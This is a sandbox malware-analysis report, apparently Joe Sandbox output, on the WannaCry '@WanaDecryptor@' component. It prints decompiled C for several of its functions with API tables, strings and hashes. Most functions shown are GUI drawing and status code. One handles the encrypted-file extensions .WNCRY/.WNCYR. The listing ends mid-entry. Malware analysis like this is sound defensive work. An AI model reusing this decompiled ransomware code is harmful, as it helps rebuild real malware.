				signed long long _t231;
				signed long long _t234;

				_t228 = __fp0;
				_push(0xffffffff);
				_push(E004140A0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t210;
				_t93 = _a20;
				_v104 = __ecx;
				_t138 = _a16;
				_t169 = _t138 & 0x000000ff;
				_v76 = _t169;
				_t192 = (_t93 & 0x000000ff) - _t169;
				_t140 = _t138 >> 0x00000010 & 0x000000ff;
				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
				_v88 = 0;
				_v96 = _t96;
				_v92 = _t140;
				asm("cdq");
				_t143 = _t96 ^ 0;
				_v100 = 0;
				asm("cdq");
				_a20 = _t192;
				_t134 = 0;
				if(0 <= _t143) {
					_t134 = _t143;
				}
				asm("cdq");
				_t100 = _t192 ^ 0;
				if(_t100 <= _t134) {
					_a16 = 0;
					if(0 <= _t143) {
						_a16 = _t143;
					}
				} else {
					_a16 = _t100;
				}
				_t193 = _a8;
				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				if(_t102 < _a16) {
					_a16 = _t102;
				}
				if(_a16 == 0) {
					_a16 = 1;
				}
				asm("fild dword [esp+0x88]");
				asm("fild dword [esp+0x8c]");
				_t135 = _a4;
				_t229 = _t228 / st1;
				_v80 = _t229;
				asm("fild dword [esp+0x1c]");
				_t230 = _t229 / st1;
				_v100 = _t230;
				asm("fild dword [esp+0x20]");
				_t231 = _t230 / st1;
				_v96 = _t231;
				st0 = _t231;
				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
				_v80 = _t107;
				if(_t107 == 0 && _a8 > 1) {
					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
						_v8 = 1;
					}
				}
				_t146 = _t193;
				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				_t202 = 0;
				asm("fild dword [esp+0x8c]");
				_v72 = 0;
				_v68 =  *_t146;
				_v76 = 0x415a44;
				asm("fidiv dword [esp+0x88]");
				_v64 =  *((intOrPtr*)(_t146 + 4));
				_v60 =  *((intOrPtr*)(_t146 + 8));
				_v56 =  *((intOrPtr*)(_t146 + 0xc));
				_a12 = _t231;
				_t112 = _a8;
				_v12 = 0;
				_v4 = 0;
				if(_t112 <= 0) {
					L31:
					_v76 = 0x415c00;
					_v12 = 1;
					L00412D52();
					 *[fs:0x0] = _v20;
					return _t112;
				} else {
					while(1) {
						asm("fild dword [esp+0x7c]");
						_t195 =  *_t193;
						L0041304A();
						_t46 = _t202 + 1; // 0x1
						_v4 = _t46;
						_t209 = _t112 + _t195;
						asm("fild dword [esp+0x7c]");
						_v68 = _t209;
						_t234 = st0 * _a12 * _a12;
						L0041304A();
						_t113 = _t112 + _t195;
						_v60 = _t113;
						if(_t202 == _a8 - 1) {
							_t113 =  *((intOrPtr*)(_v0 + 8));
							_v60 = _t113;
						}
						_t177 = _a4;
						_t151 =  *_t177;
						if(_t113 < _t151) {
							goto L29;
						}
						if(_t209 < _t151) {
							_v68 = _t151;
						}
						_t152 =  *((intOrPtr*)(_t177 + 8));
						if(_t113 > _t152) {
							_v60 = _t152;
						}
						L0041304A();
						_v92 = 0;
						L0041304A();
						_t115 = _t113 + _v100 + _v96;
						_v92 = _t115 << 8;
						L0041304A();
						_push(_t115 + _v84 & 0x000000ff | _v92);
						if(_v80 == 0) {
							_t112 = E00409D40( &_v36, _t135,  &_v68);
							_push(_t112);
							L00412FF2();
						} else {
							_push(CreateSolidBrush());
							L00412D5E();
							_t122 = E00409D40( &_v60, _t135,  &_v76);
							_t76 =  &_v96; // 0x415a44
							asm("sbb ecx, ecx");
							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
							L00412D52();
						}
						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
							L30:
							_t202 = _v4;
							_t112 = _a8;
							_v4 = _t202;
							if(_t202 < _t112) {
								_t193 = _v0;
								continue;
							}
						}
						goto L31;
						L29:
						st0 = _t234;
						goto L30;
					}
				}
			}

0x00408d70
0x00408d70
0x00408d72
0x00408d7d
0x00408d7e
0x00408d88
0x00408d8d
0x00408d92
0x00408d9f
0x00408dab
0x00408daf
0x00408dc5
0x00408dd6
0x00408dd8
0x00408dde
0x00408de2
0x00408de6
0x00408def
0x00408df1
0x00408df5
0x00408df8
0x00408e05
0x00408e07
0x00408e09
0x00408e09
0x00408e0d
0x00408e10
0x00408e14
0x00408e21
0x00408e28
0x00408e2a
0x00408e2a
0x00408e16
0x00408e16
0x00408e16
0x00408e31
0x00408e44
0x00408e48
0x00408e4a
0x00408e4a
0x00408e5a
0x00408e5c
0x00408e5c
0x00408e67
0x00408e6e
0x00408e75
0x00408e81
0x00408e89
0x00408e8d
0x00408e91
0x00408e93
0x00408e97
0x00408e9b
0x00408e9d
0x00408ea1
0x00408ea5
0x00408eaa
0x00408eae
0x00408ec2
0x00408ed6
0x00408ed8
0x00408ed8
0x00408ed6
0x00408eea
0x00408eec
0x00408ef3
0x00408ef5
0x00408efe
0x00408f02
0x00408f06
0x00408f0e
0x00408f18
0x00408f1f
0x00408f26
0x00408f2a
0x00408f31
0x00408f38
0x00408f3e
0x00408f42
0x004090b6
0x004090b6
0x004090c2
0x004090ca
0x004090d7
0x004090e1
0x00408f48
0x00408f51
0x00408f51
0x00408f55
0x00408f60
0x00408f65
0x00408f6a
0x00408f6e
0x00408f70
0x00408f74
0x00408f78
0x00408f7f
0x00408f8b
0x00408f8d
0x00408f96
0x00408f9f
0x00408fa2
0x00408fa2
0x00408fa6
0x00408fad
0x00408fb1
0x00000000
0x00000000
0x00408fb9
0x00408fbb
0x00408fbb
0x00408fbf
0x00408fc4
0x00408fc6
0x00408fc6
0x00408fd0
0x00408fe5
0x00408fe9
0x00408ffa
0x00409001
0x00409005
0x00409021
0x00409022
0x0040907e
0x00409085
0x00409086
0x00409024
0x0040902a
0x0040902f
0x00409043
0x0040904e
0x00409054
0x0040905e
0x00409068
0x00409068
0x00409099
0x0040909f
0x0040909f
0x004090a3
0x004090ac
0x004090b0
0x00408f4a
0x00000000
0x00408f4a
0x004090b0
0x00000000
0x0040909d
0x0040909d
0x00000000
0x0040909d
0x00408f51

APIs

GetDeviceCaps.GDI32(?,00000026), ref: 00408EA3
GetDeviceCaps.GDI32(?,0000000C), ref: 00408EC2
GetDeviceCaps.GDI32(?,0000000E), ref: 00408ECE
_ftol.MSVCRT ref: 00408F60
_ftol.MSVCRT ref: 00408F7F
_ftol.MSVCRT ref: 00408FD0
_ftol.MSVCRT ref: 00408FE9
_ftol.MSVCRT ref: 00409005
CreateSolidBrush.GDI32(00000000), ref: 00409024
#1641.MFC42(00000000), ref: 0040902F
FillRect.USER32(?,00000000,DZA), ref: 0040905E
#2414.MFC42 ref: 00409068
#2754.MFC42(00000000,?,?,?,00000000), ref: 00409086
#2414.MFC42 ref: 004090CA

Strings

DZA, xrefs: 0040904E, 00409058

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
String ID: DZA
API String ID: 2487345631-3378329814
Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00401600 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* _t19;
				long _t21;
				long _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				long _t48;
				void* _t49;
				intOrPtr _t50;

				_t27 = _a4;
				_t48 = _a8;
				_t19 = _t27 - 0x4e20;
				_t49 = __ecx;
				if(_t19 == 0) {
					if(_t48 != 0) {
						if(_t48 == 0xffffffff) {
							goto L14;
						}
						goto L15;
					} else {
						_push(__ecx);
						_a4 = _t50;
						L00412CAA();
						E00401970("Connected");
						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
						_push(_a4);
						_push(_t48);
						_push(_t27);
						 *(_t49 + 0xb0) = 0x23;
						L00412BAE();
						return _t21;
					}
				} else {
					_t19 = _t19 - 1;
					if(_t19 == 0) {
						if(_t48 != 0) {
							goto L9;
						} else {
							_push(__ecx);
							_a4 = _t50;
							L00412CAA();
							E00401970("Sent request");
							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
							_push(_a4);
							_push(_t48);
							_push(_t27);
							 *(_t49 + 0xb0) = 0x28;
							L00412BAE();
							return _t24;
						}
					} else {
						_t19 = _t19 - 1;
						if(_t19 != 0) {
							L15:
							_push(_a12);
							_push(_t48);
							_push(_t27);
							L00412BAE();
							return _t19;
						} else {
							if(_t48 != 0) {
								if(_t48 != 1) {
									L9:
									if(_t48 == 0xffffffff) {
										L14:
										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
									}
									goto L15;
								} else {
									_push(__ecx);
									_a4 = _t50;
									L00412CAA();
									_t25 = E00401970("Succeed");
									_push(_a4);
									_push(_t48);
									_push(_t27);
									L00412BAE();
									return _t25;
								}
							} else {
								_push(__ecx);
								_a4 = _t50;
								L00412CAA();
								_t26 = E00401970("Received response");
								_push(_a4);
								_push(_t48);
								_push(_t27);
								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
								L00412BAE();
								return _t26;
							}
						}
					}
				}
			}

0x00401601
0x00401609
0x0040160d
0x00401612
0x00401614
0x004016e7
0x00401737
0x00000000
0x00000000
0x00000000
0x004016e9
0x004016e9
0x004016ec
0x004016f5
0x004016fc
0x00401710
0x0040171c
0x0040171d
0x0040171e
0x0040171f
0x00401729
0x00401731
0x00401731
0x0040161a
0x0040161a
0x0040161b
0x00401691
0x00000000
0x00401693
0x00401693
0x00401696
0x0040169f
0x004016a6
0x004016ba
0x004016c6
0x004016c7
0x004016c8
0x004016c9
0x004016d3
0x004016db
0x004016db
0x0040161d
0x0040161d
0x0040161e
0x00401743
0x00401749
0x0040174a
0x0040174b
0x0040174c
0x00401754
0x00401624
0x00401626
0x00401661
0x004016de
0x004016e1
0x00401739
0x00401739
0x00401739
0x00000000
0x00401663
0x00401663
0x00401666
0x0040166f
0x00401676
0x00401681
0x00401682
0x00401683
0x00401684
0x0040168c
0x0040168c
0x00401628
0x00401628
0x0040162b
0x00401634
0x0040163b
0x00401646
0x00401647
0x00401648
0x00401649
0x00401653
0x0040165b
0x0040165b
0x00401626
0x0040161e
0x0040161b

APIs

#2385.MFC42 ref: 00401653
#537.MFC42(Received response), ref: 00401634

Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF

#537.MFC42(Succeed), ref: 0040166F
#2385.MFC42(?,?,?,Succeed), ref: 00401684
#537.MFC42(Sent request), ref: 0040169F
SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
#2385.MFC42 ref: 004016D3
#537.MFC42(Connected), ref: 004016F5
SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
#2385.MFC42 ref: 00401729
#2385.MFC42(?,?,?), ref: 0040174C

Strings

Succeed, xrefs: 0040166A
Connected, xrefs: 004016F0
Received response, xrefs: 0040162F
Sent request, xrefs: 0040169A

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2385$#537$MessageSend$#3092#6199#800
String ID: Connected$Received response$Sent request$Succeed
API String ID: 3790904636-3692714192
Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404DD0(void* __ecx) {
				intOrPtr _t12;
				long _t13;
				struct HFONT__* _t15;
				long _t16;
				long _t17;
				int _t29;
				int _t32;
				int _t35;

				L00412CB0();
				_t12 =  *0x42189c; // 0x0
				_t13 =  *(_t12 + 0x824);
				 *(__ecx + 0x6c) = _t13;
				_push(CreateSolidBrush(_t13));
				L00412D5E();
				_t35 = __ecx + 0x70;
				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t15);
				L00412D5E();
				_push(0x403);
				L00412CE6();
				if(_t35 != 0) {
					_t29 =  *(_t35 + 4);
				} else {
					_t29 = 0;
				}
				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
				_push(1);
				L00412CE6();
				if(_t35 != 0) {
					_t32 =  *(_t35 + 4);
				} else {
					_t32 = 0;
				}
				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
				_push(2);
				L00412CE6();
				if(_t35 != 0) {
					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
					return 1;
				} else {
					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
					return 1;
				}
			}

0x00404dd5
0x00404dda
0x00404ddf
0x00404de6
0x00404def
0x00404df3
0x00404e1a
0x00404e1d
0x00404e23
0x00404e26
0x00404e2b
0x00404e32
0x00404e39
0x00404e3f
0x00404e3b
0x00404e3b
0x00404e3b
0x00404e51
0x00404e53
0x00404e57
0x00404e5e
0x00404e64
0x00404e60
0x00404e60
0x00404e60
0x00404e70
0x00404e72
0x00404e76
0x00404e7d
0x00404e9f
0x00404ea9
0x00404e7f
0x00404e88
0x00404e92
0x00404e92

APIs

#4710.MFC42 ref: 00404DD5
CreateSolidBrush.GDI32(?), ref: 00404DE9
#1641.MFC42(00000000), ref: 00404DF3
CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
#1641.MFC42(00000000), ref: 00404E26
#3092.MFC42(00000403,00000000), ref: 00404E32
SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
#3092.MFC42(00000001), ref: 00404E57
SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
#3092.MFC42(00000002), ref: 00404E76
SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F

Strings

Arial, xrefs: 00404DF8

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
String ID: Arial
API String ID: 1126252797-493054409
Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00406DC0(void* __ecx) {
				int _v76;
				int _v80;
				char _v84;
				int _v88;
				long _v92;
				void* _v96;
				int _v100;
				void* _v104;
				long _t28;
				void* _t29;
				struct HWND__* _t30;
				int _t32;
				void* _t35;
				int _t39;
				long _t47;
				int _t48;
				void* _t51;

				_t35 = __ecx;
				_t48 = 0;
				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
				_t47 = _t28;
				_v96 = 0;
				_v92 = _t47;
				_t4 = _t47 + 1; // 0x1
				L00412CEC();
				_t51 =  &_v104 + 4;
				_v88 = _t28;
				if(_t28 == 0) {
					return _t28;
				}
				_t29 = _t35 + 0x4c0;
				if(_t29 != 0) {
					_t30 =  *(_t29 + 0x20);
				} else {
					_t30 = 0;
				}
				SendMessageA(_t30, 0x44b, _t48,  &_v96);
				_t32 = _v88;
				 *((char*)(_t32 + _t47)) = 0;
				if(_t47 < 0) {
					L15:
					_push(_v88);
					L00412C98();
					return _t32;
				} else {
					do {
						__imp___strnicmp(_t48 + _v88, "<http://", 8);
						_t51 = _t51 + 0xc;
						if(_t32 == 0) {
							L7:
							_t48 = _t48 + 1;
							_t39 = _t48;
							if(_t48 > _t47) {
								goto L14;
							}
							_t32 = _v88;
							while( *((char*)(_t48 + _t32)) != 0x3e) {
								_t48 = _t48 + 1;
								if(_t48 <= _t47) {
									continue;
								}
								goto L14;
							}
							_t32 = _t48;
							_t48 = _t48 + 1;
							if(_t32 != 0xffffffff) {
								_v100 = _t32;
								_v104 = _t39;
								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
								_t32 = 0x20;
								_push( &_v84);
								_v84 = 0x54;
								_v76 = 0x20;
								_v80 = 0x20;
								L00412F4A();
							}
							goto L14;
						}
						_t32 = _v88;
						__imp___strnicmp(_t48 + _t32, "<https://", 9);
						_t51 = _t51 + 0xc;
						if(_t32 != 0) {
							goto L14;
						}
						goto L7;
						L14:
						_t48 = _t48 + 1;
					} while (_t48 <= _t47);
					goto L15;
				}
			}

0x00406dcc
0x00406dce
0x00406ddc
0x00406dde
0x00406de0
0x00406de4
0x00406de8
0x00406dec
0x00406df1
0x00406df6
0x00406dfa
0x00406ee6
0x00406ee6
0x00406e00
0x00406e08
0x00406e0e
0x00406e0a
0x00406e0a
0x00406e0a
0x00406e1d
0x00406e1f
0x00406e25
0x00406e29
0x00406ed2
0x00406ed6
0x00406ed7
0x00000000
0x00406e2f
0x00406e2f
0x00406e3e
0x00406e44
0x00406e49
0x00406e67
0x00406e67
0x00406e6a
0x00406e6c
0x00000000
0x00000000
0x00406e6e
0x00406e72
0x00406e78
0x00406e7b
0x00000000
0x00000000
0x00000000
0x00406e7d
0x00406e7f
0x00406e81
0x00406e85
0x00406e8b
0x00406e9e
0x00406ea2
0x00406ea8
0x00406ead
0x00406eb4
0x00406ebc
0x00406ec0
0x00406ec4
0x00406ec4
0x00000000
0x00406e85
0x00406e4b
0x00406e5a
0x00406e60
0x00406e65
0x00000000
0x00000000
0x00000000
0x00406ec9
0x00406ec9
0x00406eca
0x00000000
0x00406e2f

APIs

SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
#823.MFC42(00000001,?,?), ref: 00406DEC
SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
_strnicmp.MSVCRT ref: 00406E3E
_strnicmp.MSVCRT ref: 00406E5A
SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
#6136.MFC42 ref: 00406EC4
#825.MFC42(?), ref: 00406ED7

Strings

<http://, xrefs: 00406E35
<https://, xrefs: 00406E51
T, xrefs: 00406EB4

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$_strnicmp$#6136#823#825
String ID: <http://$<https://$T
API String ID: 1228111698-1216084165
Opcode ID: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
Opcode Fuzzy Hash: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9

Uniqueness

Uniqueness Score: -1.00%

Function 00402560 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00402560(intOrPtr __ecx, WCHAR* _a4) {
				short _v720;
				intOrPtr _v724;
				void* _t21;
				void* _t22;
				WCHAR* _t23;
				void* _t30;
				short* _t31;
				intOrPtr* _t32;
				void* _t34;
				void* _t36;

				_t23 = _a4;
				_v724 = __ecx;
				_t30 = 0;
				wcscpy( &_v720, _t23);
				_t31 = wcsrchr( &_v720, 0x2e);
				_t34 =  &_v724 + 0x10;
				if(_t31 == 0) {
					L4:
					wcscat( &_v720, L".org");
				} else {
					_t32 = __imp___wcsicmp;
					_t21 =  *_t32(_t31, L".WNCRY");
					_t36 = _t34 + 8;
					if(_t21 == 0) {
						L3:
						 *_t31 = 0;
						_t30 = 1;
					} else {
						_t22 =  *_t32(_t31, L".WNCYR");
						_t34 = _t36 + 8;
						if(_t22 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				if(E004020A0(_v724, _t23,  &_v720) == 0) {
					DeleteFileW( &_v720);
					goto L11;
				} else {
					if(DeleteFileW(_t23) == 0) {
						L11:
						return 0;
					} else {
						if(_t30 != 0) {
							return 1;
						} else {
							return MoveFileW( &_v720, _t23);
						}
					}
				}
			}

0x00402567
0x00402576
0x0040257b
0x0040257d
0x00402590
0x00402592
0x00402597
0x004025c9
0x004025d3
0x00402599
0x00402599
0x004025a5
0x004025a7
0x004025ac
0x004025bd
0x004025bd
0x004025c2
0x004025ae
0x004025b4
0x004025b6
0x004025bb
0x00000000
0x00000000
0x00000000
0x00000000
0x004025bb
0x004025ac
0x004025ed
0x0040262e
0x00000000
0x004025ef
0x004025f8
0x00402637
0x00402640
0x004025fa
0x004025fc
0x00402626
0x004025fe
0x00402614
0x00402614
0x004025fc
0x004025f8

APIs

wcscpy.MSVCRT ref: 0040257D
wcsrchr.MSVCRT ref: 0040258A
_wcsicmp.MSVCRT ref: 004025A5
_wcsicmp.MSVCRT ref: 004025B4
wcscat.MSVCRT ref: 004025D3
DeleteFileW.KERNEL32(?), ref: 004025F0
MoveFileW.KERNEL32(?,?), ref: 00402604
DeleteFileW.KERNEL32(?), ref: 0040262E

Strings

.WNCYR, xrefs: 004025AE
.org, xrefs: 004025CD
.WNCRY, xrefs: 0040259F

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
String ID: .WNCRY$.WNCYR$.org
API String ID: 1016768320-4283512309
Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE

Uniqueness

Uniqueness Score: -1.00%

Function 00413102 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 80%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41baa8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422298 =  *0x422298 | 0xffffffff;
				 *0x42229c =  *0x42229c | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x42228c; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x422288; // 0x0
				 *_t24 = _t47;
				 *0x422294 = _adjust_fdiv;
				_t27 = E004133C7( *_adjust_fdiv);
				_t61 =  *0x421790; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004133C4);
				}
				E004133B2(_t27);
				_push(0x41f018);
				_push(0x41f014);
				L004133AC();
				_t29 =  *0x422284; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
				_push(0x41f010);
				_push(0x41f000);
				L004133AC();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004133A6();
				return _t41;
			}

0x00413105
0x00413107
0x0041310c
0x00413117
0x00413118
0x00413125
0x0041312a
0x0041312f
0x00413136
0x0041313d
0x00413144
0x0041314a
0x00413150
0x00413152
0x00413158
0x0041315e
0x00413167
